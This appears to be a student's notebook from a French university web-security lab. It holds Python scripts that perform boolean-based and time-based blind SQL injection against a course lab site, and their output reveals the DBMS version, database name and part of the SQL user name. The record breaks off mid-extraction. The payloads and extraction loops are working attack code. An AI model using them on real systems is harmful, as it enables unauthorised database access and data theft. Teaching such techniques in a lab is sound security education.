# ipl I317B Sécurité : labos
## Semaine 3 : Vulnérabilitées web (2)

### Exercice 1, l'oracle:
Revenons un peux en arrière sur le site de notre mauvais développeur. Nous savons que le site utilise sqlite comme système de gestion de base de donnée mais nous aimerions en identifier la version. Utilisez le site de l'exercice 1 pour récupérer cette information.

https://labo.poney.pink/v01/s02/ex1/

In [1]:
import requests
import string
import time

URL = "https://labo.poney.pink/v01/s02/ex1/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}
SUCCESS_MARKER = "Connected !"

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-_"

def try_payload(payload):
    r = requests.post(URL, data={"login": payload, "password": ""}, headers=HEADERS, timeout=10)
    return SUCCESS_MARKER in r.text, r.text

def extract_version(max_len=30, pause=0.1):
    version = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in CHARSET:
            # try double-quote style payload
            payload_dbl = f'" OR (SELECT substr(sqlite_version(),{pos},1))="{ch}" -- '
            ok, _ = try_payload(payload_dbl)
            if ok:
                version += ch
                print(f"pos {pos} -> {ch} (via double-quote payload)")
                found = True
                break

            # try single-quote style payload
            payload_sng = f"' OR (SELECT substr(sqlite_version(),{pos},1))='{ch}' -- "
            ok, _ = try_payload(payload_sng)
            if ok:
                version += ch
                print(f"pos {pos} -> {ch} (via single-quote payload)")
                found = True
                break

            # small delay
            time.sleep(pause)

        if not found:
            print(f"No character found at position {pos}; assuming end of string.")
            break
    return version

if __name__ == "__main__":
    version = extract_version(max_len=40, pause=0.05)
    print("Extracted sqlite_version():", version)


### Exercice 2, l'aveugle:
Pour ce dernier exercice, vous allez travailler un peu à l'aveugle. En effet, la page suicitant notre intérêt cette fois-ci ne contient qu'un formulaire simple qui à priori, ne fait rien ... mais il est injectable (promis) !

À vous de trouvez comment et de récupérer la version du système de gestion de base de donnée : https://labo.poney.pink/v01/s02/ex2/

Tips:
  - Cette fois-ci, c'est plus du sqlite mais du mariadb : https://mariadb.com/kb/en/version/
  - Et vous travaillez à l'aveugle ;-)

In [16]:
import requests
import time


URL = "https://labo.poney.pink/v01/s02/ex2/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# Tunables
SLEEP_DELAY = 5       # server sleeps this many seconds when condition true
TIMEOUT = 20          # must be > SLEEP_DELAY
PAUSE = 0.05            # pause between requests to be polite
MAX_POS = 10            # test positions 1..MAX_POS (adjust)
CHARSET = "0123456789." + "-_"

def elapsed_for_payload(payload: str) -> float:
    start = time.time()
    try:
        _ = requests.post(URL, data={"id": payload}, headers=HEADERS, timeout=TIMEOUT)
        return time.time() - start
    except requests.exceptions.RequestException:
        # Network error or timeout: return a large number so you can see it
        return TIMEOUT + 1.0

def test_once(pos: int, ch: str, quote: str) -> float:
    """
    Build payload testing SUBSTRING(VERSION(),pos,1) = ch using the provided quote type,
    POST it and return elapsed time in seconds.
    """
    if quote == '"':
        payload = f'1 OR IF(SUBSTRING(VERSION(),{pos},1) = "{ch}", SLEEP({SLEEP_DELAY}), 0) -- '
    else:
        payload = f"1 OR IF(SUBSTRING(VERSION(),{pos},1) = '{ch}', SLEEP({SLEEP_DELAY}), 0) -- "
    elapsed = elapsed_for_payload(payload)
    return elapsed

def run_manual_timing(max_pos: int = MAX_POS):
    print(f"Manual time-blind tester -> URL: {URL}")
    print(f"SLEEP_DELAY={SLEEP_DELAY}s, TIMEOUT={TIMEOUT}s, PAUSE={PAUSE}s")
    print(f"Testing positions 1..{max_pos} with charset length {len(CHARSET)}")
    print("-" * 80)
    for pos in range(1, max_pos + 1):
        print(f"\n=== Position {pos} ===")
        for ch in CHARSET:
            # try double-quote first (two measurements)
            t1 = test_once(pos, ch, quote='"')
            time.sleep(PAUSE)
            t2 = test_once(pos, ch, quote='"')
            time.sleep(PAUSE)
            print(f'pos={pos} ch={repr(ch):4} quote="  timings: {t1:6.3f}s, {t2:6.3f}s')
            # now single-quote variant (two measurements)
            t3 = test_once(pos, ch, quote="'")
            time.sleep(PAUSE)
            t4 = test_once(pos, ch, quote="'")
            time.sleep(PAUSE)
            print(f'pos={pos} ch={repr(ch):4} quote=\'  timings: {t3:6.3f}s, {t4:6.3f}s')
    print("\nDone. Inspect timings and pick the character whose timings ≈ SLEEP_DELAY.")

if __name__ == "__main__":
    run_manual_timing(MAX_POS)


Manual time-blind tester -> URL: https://labo.poney.pink/v01/s02/ex2/
SLEEP_DELAY=10s, TIMEOUT=20s, PAUSE=0.05s
Testing positions 1..10 with charset length 13
--------------------------------------------------------------------------------

=== Position 1 ===
pos=1 ch='0'  quote="  timings:  0.618s,  0.628s
pos=1 ch='0'  quote='  timings:  0.857s,  0.546s
pos=1 ch='1'  quote="  timings: 21.000s, 21.000s


KeyboardInterrupt: 

In [21]:
import requests
import time

URL = "https://labo.poney.pink/v01/s02/ex2/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# Tunables
SLEEP_DELAY = 5       # server sleeps this many seconds when condition true
TIMEOUT = 5          # must be > SLEEP_DELAY
PAUSE = 0.05          # pause between requests to be polite
MAX_POS = 50         # test positions 1..MAX_POS (adjust)
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-_"

# --------------------------------------------------------------

def elapsed_for_payload(payload: str) -> float:
    start = time.time()
    try:
        _ = requests.post(URL, data={"id": payload}, headers=HEADERS, timeout=TIMEOUT)
        return time.time() - start
    except requests.exceptions.RequestException:
        return TIMEOUT + 1.0

# --------------------------------------------------------------

def auto_test(pos: int, ch: str, quote: str) -> bool:
    """
    Send a payload and automatically return True if response time > SLEEP_DELAY,
    otherwise False.
    """
    if quote == '"':
        payload = f'1 OR IF(SUBSTRING(VERSION(),{pos},1)="{ch}", SLEEP({SLEEP_DELAY}), 0) -- '
    else:
        payload = f"1 OR IF(SUBSTRING(VERSION(),{pos},1)='{ch}', SLEEP({SLEEP_DELAY}), 0) -- "

    elapsed = elapsed_for_payload(payload)
    # print(f"[DEBUG] pos={pos} ch={repr(ch)} quote={quote} -> {elapsed:.3f}s")

    return elapsed > SLEEP_DELAY

# --------------------------------------------------------------

def run_auto_timing(max_pos: int = MAX_POS):
    print(f"Auto time-blind tester -> URL: {URL}")
    print(f"SLEEP_DELAY={SLEEP_DELAY}s, TIMEOUT={TIMEOUT}s, PAUSE={PAUSE}s")
    print(f"Testing positions 1..{max_pos} with charset length {len(CHARSET)}")
    print("-" * 80)

    extracted = ""
    for pos in range(1, max_pos + 1):
        found = False
        for ch in CHARSET:
            time.sleep(PAUSE)
            if auto_test(pos, ch, quote="'") or auto_test(pos, ch, quote='"'):
                print(f"[FOUND] Position {pos}: '{ch}' (elapsed > {SLEEP_DELAY}s)")
                extracted += ch
                print(f"[CURRENT RESULT] {extracted}")
                found = True
                break
        if not found:
            print(f"[!] No match at position {pos}")
            extracted += "?"
            break
    print("\nExtracted:", extracted)

# --------------------------------------------------------------

if __name__ == "__main__":
    run_auto_timing(MAX_POS)


Auto time-blind tester -> URL: https://labo.poney.pink/v01/s02/ex2/
SLEEP_DELAY=5s, TIMEOUT=5s, PAUSE=0.05s
Testing positions 1..50 with charset length 65
--------------------------------------------------------------------------------
[FOUND] Position 1: '1' (elapsed > 5s)
[CURRENT RESULT] 1
[FOUND] Position 2: '1' (elapsed > 5s)
[CURRENT RESULT] 11
[FOUND] Position 3: '.' (elapsed > 5s)
[CURRENT RESULT] 11.
[FOUND] Position 4: '5' (elapsed > 5s)
[CURRENT RESULT] 11.5
[FOUND] Position 5: '.' (elapsed > 5s)
[CURRENT RESULT] 11.5.
[FOUND] Position 6: '1' (elapsed > 5s)
[CURRENT RESULT] 11.5.1
[FOUND] Position 7: '-' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-
[FOUND] Position 8: 'm' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-m
[FOUND] Position 9: 'a' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-ma
[FOUND] Position 10: 'r' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-mar
[FOUND] Position 11: 'i' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-mari
[FOUND] Position 12: 'a' (elapsed > 5s)
[CURRENT RESULT] 11.5.1-maria

### Exercice 3, bonus:
Toujours pour l'exercice 2, pouvez-vous extraire le nom de la base de donnée et l'utilisateur utilisé pour s'y connecter ?

In [24]:
import requests
import time

URL = "https://labo.poney.pink/v01/s02/ex2/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# --- Tunables ---
SLEEP_DELAY = 5
TIMEOUT = 20
PAUSE = 0.05
MAX_LEN = 100          # longueur max du champ à tester
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@.-"

# -----------------------------------------------------------

def elapsed_for_payload(payload: str) -> float:
    start = time.time()
    try:
        _ = requests.post(URL, data={"id": payload}, headers=HEADERS, timeout=TIMEOUT)
        return time.time() - start
    except requests.exceptions.RequestException:
        return TIMEOUT + 1.0

# -----------------------------------------------------------

def auto_test(expr: str, pos: int, ch: str, quote: str) -> bool:
    """Retourne True si le caractère testé provoque un délai > SLEEP_DELAY."""
    if quote == '"':
        payload = f'1 OR IF(SUBSTRING({expr},{pos},1)="{ch}",SLEEP({SLEEP_DELAY}),0)-- '
    else:
        payload = f"1 OR IF(SUBSTRING({expr},{pos},1)='{ch}',SLEEP({SLEEP_DELAY}),0)-- "
    elapsed = elapsed_for_payload(payload)
    return elapsed > SLEEP_DELAY

# -----------------------------------------------------------

def extract_value(expr: str, label: str) -> str:
    """Extrait automatiquement le résultat d'une fonction SQL via time-based attack."""
    print(f"\n[+] Extraction de {label} avec SLEEP_DELAY={SLEEP_DELAY}s")
    extracted = ""
    for pos in range(1, MAX_LEN + 1):
        found = False
        for ch in CHARSET:
            time.sleep(PAUSE)
            if auto_test(expr, pos, ch, quote="'") or auto_test(expr, pos, ch, quote='"'):
                extracted += ch
                print(f"[{label}] {pos:02d}: '{ch}' -> {extracted}")
                found = True
                break
        if not found:
            # fin de chaîne probable
            break
    print(f"\n✅ {label} = '{extracted}'")
    return extracted

# -----------------------------------------------------------

if __name__ == "__main__":
    db_name = extract_value("DATABASE()", "DATABASE()")
    user_name = extract_value("USER()", "USER()")
    print("\nFinal Result :")
    print(f"Base de données : {db_name}")
    print(f"Utilisateur SQL  : {user_name}")



[+] Extraction de DATABASE() avec SLEEP_DELAY=5s
[DATABASE()] 01: 'c' -> c
[DATABASE()] 02: 'l' -> cl
[DATABASE()] 03: 'o' -> clo
[DATABASE()] 04: 's' -> clos
[DATABASE()] 05: 'e' -> close
[DATABASE()] 06: 'y' -> closey
[DATABASE()] 07: 'o' -> closeyo
[DATABASE()] 08: 'u' -> closeyou
[DATABASE()] 09: 'r' -> closeyour
[DATABASE()] 10: 'e' -> closeyoure
[DATABASE()] 11: 'y' -> closeyourey
[DATABASE()] 12: 'e' -> closeyoureye
[DATABASE()] 13: 's' -> closeyoureyes

✅ DATABASE() = 'closeyoureyes'

[+] Extraction de USER() avec SLEEP_DELAY=5s
[USER()] 01: 'i' -> i
[USER()] 02: 't' -> it
[USER()] 03: 's' -> its
[USER()] 04: 'm' -> itsm
[USER()] 05: 'e' -> itsme
[USER()] 06: 'm' -> itsmem
[USER()] 07: 'a' -> itsmema
[USER()] 08: 'r' -> itsmemar
[USER()] 09: 'i' -> itsmemari
[USER()] 10: 'a' -> itsmemaria
[USER()] 11: '@' -> itsmemaria@
[USER()] 12: 'v' -> itsmemaria@v
[USER()] 13: '7' -> itsmemaria@v7
[USER()] 14: '2' -> itsmemaria@v72
[USER()] 15: '.' -> itsmemaria@v72.
[USER()] 16: '2' -> i